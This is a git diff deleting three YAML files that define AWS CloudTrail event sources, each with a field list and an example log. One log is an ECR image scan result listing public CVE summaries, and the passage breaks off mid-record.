diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml
deleted file mode 100644
index 461d9d06c7..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DeleteWebACL.yml
+++ /dev/null
@@ -1,78 +0,0 @@
-event_name: AWS CloudTrail DeleteWebACL
-fields:
-- _time
-- apiVersion
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.changeToken
-- requestParameters.webACLId
-- responseElements.changeToken
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- tlsDetails.cipherSuite
-- tlsDetails.clientProvidedHostHeader
-- tlsDetails.tlsVersion
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.type
-- userIdentity.userName
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "IAMUser", "principalId": "AIDAYTOGP2RLI4PXTGCEU", "arn": "arn:aws:iam::111111111111:user/gowthamaraj_cli", "accountId": "111111111111", "accessKeyId": "AKIAYTOGP2RLFLKADUVG", "userName": "gowthamaraj_cli"}, "eventTime": "2022-07-20T21:32:54Z", "eventSource": "waf.amazonaws.com", "eventName": "DeleteWebACL", "awsRegion": "us-east-1", "sourceIPAddress": "67.171.71.185", "userAgent": "aws-cli/2.7.3 Python/3.9.13 Darwin/21.5.0 source/x86_64 prompt/off command/waf.delete-web-acl", "requestParameters": {"changeToken": "11eb19d6-d960-4398-8761-6a8fbf8fc425", "webACLId": "6a9771ff-7d94-4fec-a049-e42da0bc7347"}, "responseElements": {"changeToken": "11eb19d6-d960-4398-8761-6a8fbf8fc425"}, "requestID": "55fd5189-5f86-4052-8e8e-993faf1753e8", "eventID": "c8fd51ac-676d-4d5d-aa5a-7e642cf5bb97", "readOnly": false, "eventType": "AwsApiCall", "apiVersion": "2015-08-24", "managementEvent": true, "recipientAccountId": "111111111111", "eventCategory": "Management", "tlsDetails": {"tlsVersion": "TLSv1.2", "cipherSuite": "ECDHE-RSA-AES128-GCM-SHA256", "clientProvidedHostHeader": "waf.amazonaws.com"}}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml
deleted file mode 100644
index ac48a3785c..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeEventAggregates.yml
+++ /dev/null
@@ -1,74 +0,0 @@
-event_name: AWS CloudTrail DescribeEventAggregates
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.aggregateField
-- requestParameters.filter.eventStatusCodes{}
-- requestParameters.filter.startTimes{}.from
-- responseElements
-- sessionCredentialFromConsole
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "Root", "principalId": "140429656527", "arn": "arn:aws:iam::140429656527:root", "accountId": "140429656527", "accessKeyId": "ASIASBMSCQHHQQ6LB24V", "sessionContext": {"sessionIssuer": {}, "webIdFederationData": {}, "attributes": {"creationDate": "2023-01-31T21:58:17Z", "mfaAuthenticated": "true"}}}, "eventTime": "2023-02-01T02:52:34Z", "eventSource": "health.amazonaws.com", "eventName": "DescribeEventAggregates", "awsRegion": "us-east-1", "sourceIPAddress": "54.188.0.152", "userAgent": "AWS Internal", "requestParameters": {"aggregateField": "eventTypeCategory", "filter": {"eventStatusCodes": ["open", "upcoming"], "startTimes": [{"from": "Jan 25, 2023 2:54:32 AM"}]}}, "responseElements": null, "requestID": "d6adf050-1d7a-4c25-9d48-0319e33f6f9a", "eventID": "201cee69-61ab-4ffb-80b7-bd31e81e0d82", "readOnly": true, "eventType": "AwsApiCall", "managementEvent": true, "recipientAccountId": "140429656527", "eventCategory": "Management", "sessionCredentialFromConsole": "true"}'
diff --git a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml b/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml
deleted file mode 100644
index 0fbf4c9740..0000000000
--- a/data_sources/cloud/event_sources/AWS_CloudTrail_DescribeImageScanFindings.yml
+++ /dev/null
@@ -1,104 +0,0 @@
-event_name: AWS CloudTrail DescribeImageScanFindings
-fields:
-- _time
-- app
-- awsRegion
-- aws_account_id
-- command
-- date_hour
-- date_mday
-- date_minute
-- date_month
-- date_second
-- date_wday
-- date_year
-- date_zone
-- dest
-- dvc
-- errorCode
-- eventCategory
-- eventID
-- eventName
-- eventSource
-- eventTime
-- eventType
-- eventVersion
-- eventtype
-- host
-- index
-- linecount
-- managementEvent
-- msg
-- object_category
-- product
-- punct
-- readOnly
-- recipientAccountId
-- region
-- requestID
-- requestParameters.imageId.imageDigest
-- requestParameters.maxResults
-- requestParameters.repositoryName
-- responseElements.imageId.imageDigest
-- responseElements.imageScanFindings.findingSeverityCounts.HIGH
-- responseElements.imageScanFindings.findingSeverityCounts.INFORMATIONAL
-- responseElements.imageScanFindings.findingSeverityCounts.LOW
-- responseElements.imageScanFindings.findingSeverityCounts.MEDIUM
-- responseElements.imageScanFindings.findingSeverityCounts.UNDEFINED
-- responseElements.imageScanFindings.findings{}.attributes{}.key
-- responseElements.imageScanFindings.findings{}.attributes{}.value
-- responseElements.imageScanFindings.findings{}.description
-- responseElements.imageScanFindings.findings{}.name
-- responseElements.imageScanFindings.findings{}.severity
-- responseElements.imageScanFindings.findings{}.uri
-- responseElements.imageScanFindings.imageScanCompletedAt
-- responseElements.imageScanFindings.vulnerabilitySourceUpdatedAt
-- responseElements.imageScanStatus.description
-- responseElements.imageScanStatus.status
-- responseElements.registryId
-- responseElements.repositoryName
-- signature
-- source
-- sourceIPAddress
-- sourcetype
-- splunk_server
-- src
-- src_ip
-- start_time
-- tag
-- tag::eventtype
-- timeendpos
-- timestartpos
-- user
-- userAgent
-- userIdentity.accessKeyId
-- userIdentity.accountId
-- userIdentity.arn
-- userIdentity.principalId
-- userIdentity.sessionContext.attributes.creationDate
-- userIdentity.sessionContext.attributes.mfaAuthenticated
-- userIdentity.sessionContext.sessionIssuer.accountId
-- userIdentity.sessionContext.sessionIssuer.arn
-- userIdentity.sessionContext.sessionIssuer.principalId
-- userIdentity.sessionContext.sessionIssuer.type
-- userIdentity.sessionContext.sessionIssuer.userName
-- userIdentity.type
-- userName
-- user_access_key
-- user_agent
-- user_arn
-- user_group_id
-- user_id
-- user_name
-- user_type
-- vendor
-- vendor_account
-- vendor_product
-- vendor_region
-example_log: '{"eventVersion": "1.08", "userIdentity": {"type": "AssumedRole", "principalId": "AAAAAAAAAAAAAAAAAAAAA:test@test.com", "arn": "arn:aws:sts::111111111111:assumed-role/role_name/test@test.com", "accountId": "111111111111", "accessKeyId": "AKIAIOSFODNN7EXAMPLE", "sessionContext": {"sessionIssuer": {"type": "Role", "principalId": "AKIAIOSFODNN7EXAMPLE", "arn": "arn:aws:iam::111111111111:role/aws-reserved/test/region/group", "accountId": "111111111111", "userName": "test"}, "webIdFederationData": {}, "attributes": {"creationDate": "2021-08-11T09:42:53Z", "mfaAuthenticated": "false"}}}, "eventTime": "2021-08-11T11:52:27Z", "eventSource": "ecr.amazonaws.com", "eventName": "DescribeImageScanFindings", "awsRegion": "eu-central-1", "sourceIPAddress": "154.16.165.133", "userAgent": "aws-internal/3 aws-sdk-java/1.11.1030 Linux/4.9.273-0.1.ac.226.84.332.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.302-b08 java/1.8.0_302 vendor/Oracle_Corporation cfg/retry-mode/legacy", "requestParameters": {"repositoryName": "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"}, "maxResults": 1000}, "responseElements": {"registryId": "111111111111", "repositoryName": "devsecops/cat_dog_client", "imageId": {"imageDigest": "sha256:a27d73188718a511a1ec1ec788826674b21e097f29873dde734a4dedfbfab1c6"}, "imageScanStatus": {"status": "COMPLETE", "description": "The scan was completed successfully."}, "imageScanFindings": {"imageScanCompletedAt": "Aug 11, 2021, 11:30:16 AM", "vulnerabilitySourceUpdatedAt": "Aug 11, 2021, 1:17:52 AM", "findings": [{"name": "CVE-2019-25013", "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-25013", "severity": "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, {"key": "CVSS2_SCORE", "value": "7.1"}]}, {"name": "CVE-2021-33574", "description": "The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-33574", "severity": "HIGH", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "7.5"}]}, {"name": "CVE-2018-12886", "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-12886", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "8.3.0-6"}, {"key": "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-1751", "description": "An out-of-bounds write vulnerability was found in glibc before 2.31 when handling signal trampolines on PowerPC. Specifically, the backtrace function did not properly check the array bounds when storing the frame address, resulting in a denial of service or potential code execution. The highest threat from this vulnerability is to system availability.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1751", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:P/I:P/A:C"}, {"key": "CVSS2_SCORE", "value": "5.9"}]}, {"name": "CVE-2021-3326", "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid input sequences in the ISO-2022-JP-3 encoding, fails an assertion in the code path and aborts the program, potentially resulting in a denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-3326", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-35942", "description": "The wordexp function in the GNU C Library (aka glibc) through 2.33 may crash or read arbitrary memory in parse_param (in posix/wordexp.c) when called with an untrusted, crafted pattern, potentially resulting in a denial of service or disclosure of information. This occurs because atoi was used but strtoul should have been used to ensure correct calculations.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-35942", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "6.4"}]}, {"name": "CVE-2019-12904", "description": "In Libgcrypt 1.8.4, the C implementation of AES is vulnerable to a flush-and-reload side-channel attack because physical addresses are available to other processes. (The C implementation is used on platforms where an assembly-language implementation is unavailable.)", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12904", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-6363", "description": "** DISPUTED ** In the GD Graphics Library (aka LibGD) through 2.2.5, there is a heap-based buffer over-read in tiffWriter in gd_tiff.c. NOTE: the vendor says \"In my opinion this issue should not have a CVE, since the GD and GD2 formats are documented to be ''obsolete, and should only be used for development and testing purposes.''\"", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-6363", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"}, {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2019-12290", "description": "GNU libidn2 before 2.2.0 fails to perform the roundtrip checks specified in RFC3490 Section 4.2 when converting A-labels to U-labels. This makes it possible in some circumstances for one domain to impersonate another. By creating a malicious domain that matches a target domain except for the inclusion of certain punycoded Unicode characters (that would be discarded when converted first to a Unicode label and then back to an ASCII label), arbitrary domains can be impersonated.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-12290", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.0.5-1+deb10u1"}, {"key": "package_name", "value": "libidn2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13115", "description": "In libssh2 before 1.9.0, kex_method_diffie_hellman_group_exchange_sha256_key_exchange in kex.c has an integer overflow that could lead to an out-of-bounds read in the way packets are read from the server. A remote attacker who compromises a SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server. This is related to an _libssh2_check_length mistake, and is different from the various issues fixed in 1.8.1, such as CVE-2019-3855.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13115", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"}, {"key": "package_name", "value": "libssh2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5.8"}]}, {"name": "CVE-2016-9318", "description": "libxml2 2.9.4 and earlier, as used in XMLSec 1.2.23 and earlier and other products, does not offer a flag directly indicating that the current document may be read but other files may not be opened, which makes it easier for remote attackers to conduct XML External Entity (XXE) attacks via a crafted document.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-9318", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"}, {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2017-16932", "description": "parser.c in libxml2 before 2.9.5 does not prevent infinite recursion in parameter entities.", "uri": "https://security-tracker.debian.org/tracker/CVE-2017-16932", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2.9.4+dfsg1-7+deb10u2"}, {"key": "package_name", "value": "libxml2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-36309", "description": "ngx_http_lua_module (aka lua-nginx-module) before 0.10.16 in OpenResty allows unsafe characters in an argument when using the
-  API to mutate a URI, or a request or response header.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-36309", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "1.21.1-1~buster"}, {"key": "package_name", "value": "nginx"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-14155", "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-14155", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "2:8.39-12"}, {"key": "package_name", "value": "pcre3"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-3843", "description": "It was discovered that a systemd service that uses DynamicUser property can create a SUID/SGID binary that would be allowed to run as the transient service UID/GID even after the service is terminated. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the UID/GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3843", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2019-3844", "description": "It was discovered that a systemd service that uses DynamicUser property can get new privileges through the execution of SUID binaries, which would allow to create binaries owned by the service transient group with the setgid bit set. A local attacker may use this flaw to access resources that will be owned by a potentially different service in the future, when the GID will be recycled.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-3844", "severity": "MEDIUM", "attributes": [{"key": "package_version", "value": "241-7~deb10u8"}, {"key": "package_name", "value": "systemd"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "4.6"}]}, {"name": "CVE-2016-2781", "description": "chroot in GNU coreutils, when used with --userspec, allows local users to escape to the parent session via a crafted TIOCSTI ioctl call, which pushes characters to the terminal''s input buffer.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-2781", "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.30-3"}, {"key": "package_name", "value": "coreutils"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-22898", "description": "curl 7.7 through 7.76.1 suffers from an information disclosure when the `-t` command line option, known as `CURLOPT_TELNETOPTIONS` in libcurl, is used to send variable=content pairs to TELNET servers. Due to a flaw in the option parser for sending NEW_ENV variables, libcurl could be made to pass on uninitialized data from a stack based buffer to the server, resulting in potentially revealing sensitive internal information to the server using a clear-text network protocol.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-22898", "severity": "LOW", "attributes": [{"key": "package_version", "value": "7.64.0-4+deb10u2"}, {"key": "package_name", "value": "curl"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name": "CVE-2019-15847", "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-15847", "severity": "LOW", "attributes": [{"key": "package_version", "value": "8.3.0-6"}, {"key": "package_name", "value": "gcc-8"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2020-1752", "description": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-1752", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "3.7"}]}, {"name": "CVE-2020-6096", "description": "An exploitable signed comparison vulnerability exists in the ARMv7 memcpy() implementation of GNU glibc 2.30.9000. Calling memcpy() (on ARMv7 targets that utilize the GNU glibc implementation) with a negative value for the ''num'' parameter results in a signed comparison vulnerability. If an attacker underflows the ''num'' parameter to memcpy(), this vulnerability could lead to undefined behavior such as writing to out-of-bounds memory and potentially remote code execution. Furthermore, this memcpy() implementation allows for program execution to continue in scenarios where a segmentation fault or crash should have occurred. The dangers occur in that subsequent execution and iterations of this code will be executed with this corrupted data.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-6096", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, {"key": "CVSS2_SCORE", "value": "6.8"}]}, {"name": "CVE-2020-10029", "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-10029", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2020-27618", "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", "uri": "https://security-tracker.debian.org/tracker/CVE-2020-27618", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2016-10228", "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", "uri": "https://security-tracker.debian.org/tracker/CVE-2016-10228", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "4.3"}]}, {"name": "CVE-2019-19126", "description": "On the x86-64 architecture, the GNU C Library (aka glibc) before 2.31 fails to ignore the LD_PREFER_MAP_32BIT_EXEC environment variable during program execution after a security transition, allowing local attackers to restrict the possible mapping addresses for loaded libraries and thus bypass ASLR for a setuid program.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-19126", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-27645", "description": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-27645", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.28-10"}, {"key": "package_name", "value": "glibc"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:M/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "1.9"}]}, {"name": "CVE-2019-14855", "description": "A flaw was found in the way certificate signatures could be forged using collisions found in the SHA-1 algorithm. An attacker could use this weakness to create forged certificate signatures. This issue affects GnuPG versions before 2.2.18.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-14855", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.2.12-1+deb10u1"},
-  {"key": "package_name", "value": "gnupg2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2019-13627", "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-13627", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.4-5+deb10u1"}, {"key": "package_name", "value": "libgcrypt20"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:H/Au:N/C:P/I:P/A:N"}, {"key": "CVSS2_SCORE", "value": "2.6"}]}, {"name": "CVE-2018-14553", "description": "gdImageClone in gd.c in libgd 2.1.0-rc2 through 2.2.5 has a NULL pointer dereference allowing attackers to crash an application via a specific function call sequence. Only affects PHP when linked with an external libgd (not bundled).", "uri": "https://security-tracker.debian.org/tracker/CVE-2018-14553", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.2.5-5.2"}, {"key": "package_name", "value": "libgd2"}, {"key": "CVSS2_VECTOR", "value": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "5"}]}, {"name": "CVE-2021-36086", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36086", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36085", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36085", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36087", "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36087", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2021-36084", "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __cil_verify_classpermission and __cil_pre_verify_helper).", "uri": "https://security-tracker.debian.org/tracker/CVE-2021-36084", "severity": "LOW", "attributes": [{"key": "package_version", "value": "2.8-1"}, {"key": "package_name", "value": "libsepol"}, {"key": "CVSS2_VECTOR", "value": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}, {"key": "CVSS2_SCORE", "value": "2.1"}]}, {"name": "CVE-2019-17498", "description": "In libssh2 v1.9.0 and earlier versions, the SSH_MSG_DISCONNECT logic in packet.c has an integer overflow in a bounds check, enabling an attacker to specify an arbitrary (out-of-bounds) offset for a subsequent memory read. A crafted SSH server may be able to disclose sensitive information or cause a denial of service condition on the client system when a user connects to the server.", "uri": "https://security-tracker.debian.org/tracker/CVE-2019-17498", "severity": "LOW", "attributes": [{"key": "package_version", "value": "1.8.0-2.1"}, {"key": "package_name", "value": "libssh2"}, 